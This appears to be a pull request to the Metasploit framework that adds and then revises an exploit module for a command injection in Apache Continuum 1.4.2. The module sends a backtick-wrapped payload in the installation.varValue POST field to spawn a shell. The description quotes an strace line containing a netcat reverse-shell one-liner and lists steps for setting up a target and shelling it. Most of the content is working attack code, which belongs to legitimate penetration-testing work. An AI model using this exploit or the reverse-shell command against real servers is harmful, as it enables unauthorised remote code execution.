### PR TITLE
Add Apache Continuum exploit

### DIFF
--- a/lib/msf/core/exploit/cmdstager.rb
+++ b/lib/msf/core/exploit/cmdstager.rb
@@ -306,14 +306,14 @@ module Exploit::CmdStager
   # overriden by a module this mixin.
   #
   # @param opts [Hash] Hash of configuration options.
-  def execute_cmdstager_begin(opts)
+  def execute_cmdstager_begin(opts = {})
   end
 
   # Code to execute after the cmd stager stub. This method is designed to be
   # overriden by a module this mixin.
   #
   # @param opts [Hash] Hash of configuration options.
-  def execute_cmdstager_end(opts)
+  def execute_cmdstager_end(opts = {})
   end
 
   # Code called to execute each command via an arbitrary module-defined vector.
@@ -321,7 +321,7 @@ module Exploit::CmdStager
   #
   # @param cmd [String] The command to execute.
   # @param opts [Hash] Hash of configuration options.
-  def execute_command(cmd, opts)
+  def execute_command(cmd, opts = {})
     raise NotImplementedError
   end
 

--- a/modules/exploits/linux/http/apache_continuum_cmd_exec.rb
+++ b/modules/exploits/linux/http/apache_continuum_cmd_exec.rb
@@ -8,37 +8,32 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'            => 'Apache Continuum Arbitrary Command Execution',
-      'Description'     => %q{
+      'Name'           => 'Apache Continuum Arbitrary Command Execution',
+      'Description'    => %q{
         This module exploits a command injection in Apache Continuum <= 1.4.2.
         By injecting a command into the installation.varValue POST parameter to
         /continuum/saveInstallation.action, a shell can be spawned.
       },
-      'Author'          => [
+      'Author'         => [
         'David Shanahan', # Proof of concept
         'wvu'             # Metasploit module
       ],
-      'References'      => [
+      'References'     => [
         %w{EDB 39886}
       ],
-      'DisclosureDate'  => 'Apr 6 2016',
-      'License'         => MSF_LICENSE,
-      'Platform'        => 'unix',
-      'Arch'            => ARCH_CMD,
-      'Privileged'      => false,
-      'Payload'         => {
-        'Compat'        => {
-          'PayloadType' => 'cmd cmd_bash',
-          'RequiredCmd' => 'generic netcat bash-tcp'
-        }
-      },
-      'Targets'         => [
+      'DisclosureDate' => 'Apr 6 2016',
+      'License'        => MSF_LICENSE,
+      'Platform'       => 'linux',
+      'Arch'           => [ARCH_X86, ARCH_X86_64],
+      'Privileged'     => false,
+      'Targets'        => [
         ['Apache Continuum <= 1.4.2', {}]
       ],
-      'DefaultTarget'   => 0
+      'DefaultTarget'  => 0
     ))
 
     register_options([
@@ -62,13 +57,18 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
+    print_status('Injecting CmdStager payload...')
+    execute_cmdstager(flavor: :bourne)
+  end
+
+  def execute_command(cmd, opts = {})
     send_request_cgi(
       'method'    => 'POST',
       'uri'       => '/continuum/saveInstallation.action',
       'vars_post' => {
         'installation.name'     => Rex::Text.rand_text_alpha(8),
         'installation.type'     => 'jdk',
-        'installation.varValue' => '`' + payload.encoded + '`'
+        'installation.varValue' => '`' + cmd + '`'
       }
     )
   end

--- a/modules/exploits/linux/http/apache_continuum_cmd_exec.rb
+++ b/modules/exploits/linux/http/apache_continuum_cmd_exec.rb
@@ -1,0 +1,76 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => 'Apache Continuum Arbitrary Command Execution',
+      'Description'     => %q{
+        This module exploits a command injection in Apache Continuum <= 1.4.2.
+        By injecting a command into the installation.varValue POST parameter to
+        /continuum/saveInstallation.action, a shell can be spawned.
+      },
+      'Author'          => [
+        'David Shanahan', # Proof of concept
+        'wvu'             # Metasploit module
+      ],
+      'References'      => [
+        %w{EDB 39886}
+      ],
+      'DisclosureDate'  => 'Apr 6 2016',
+      'License'         => MSF_LICENSE,
+      'Platform'        => 'unix',
+      'Arch'            => ARCH_CMD,
+      'Privileged'      => false,
+      'Payload'         => {
+        'Compat'        => {
+          'PayloadType' => 'cmd cmd_bash',
+          'RequiredCmd' => 'generic netcat bash-tcp'
+        }
+      },
+      'Targets'         => [
+        ['Apache Continuum <= 1.4.2', {}]
+      ],
+      'DefaultTarget'   => 0
+    ))
+
+    register_options([
+      Opt::RPORT(8080)
+    ])
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri'    => '/continuum/about.action'
+    )
+
+    if res && res.body.include?('1.4.2')
+      CheckCode::Appears
+    elsif res && res.code == 200
+      CheckCode::Detected
+    else
+      CheckCode::Safe
+    end
+  end
+
+  def exploit
+    send_request_cgi(
+      'method'    => 'POST',
+      'uri'       => '/continuum/saveInstallation.action',
+      'vars_post' => {
+        'installation.name'     => Rex::Text.rand_text_alpha(8),
+        'installation.type'     => 'jdk',
+        'installation.varValue' => '`' + payload.encoded + '`'
+      }
+    )
+  end
+
+end


### PR DESCRIPTION
**What is it?**

> Apache Continuum™ is an enterprise-ready continuous integration server with features such as automated builds, release management, role-based security, and integration with popular build tools and source control management systems.

**How does it work?**

This one's another simple command injection through a POST parameter. `installation.varValue` is the injectable variable. It appears to be `$JAVA_HOME`. :)

Here's why you need backticks (or an equivalent escape):

```
[pid 11250] execve("/bin/sh", ["/bin/sh", "-c", "\"`mkfifo /tmp/qpeaccl; nc [redacted] 4444 0</tmp/qpeaccl | /bin/sh >/tmp/qpeaccl 2>&1; rm /tmp/qpeaccl `/bin/java\" -version"], [/* 69 vars */]) = 0
```

The quoting screws it up. At least they're quoting variables properly. :D

**Verification steps:**
- [x] http://mirrors.sonic.net/apache/continuum/binaries/apache-continuum-1.4.2-bin.tar.gz
- [x] `tar xf apache-continuum-1.4.2-bin.tar.gz`
- [x] `apache-continuum-1.4.2/bin/continuum console`
- [x] Add an admin user in the web interface (port 8080)
- [x] Shell it
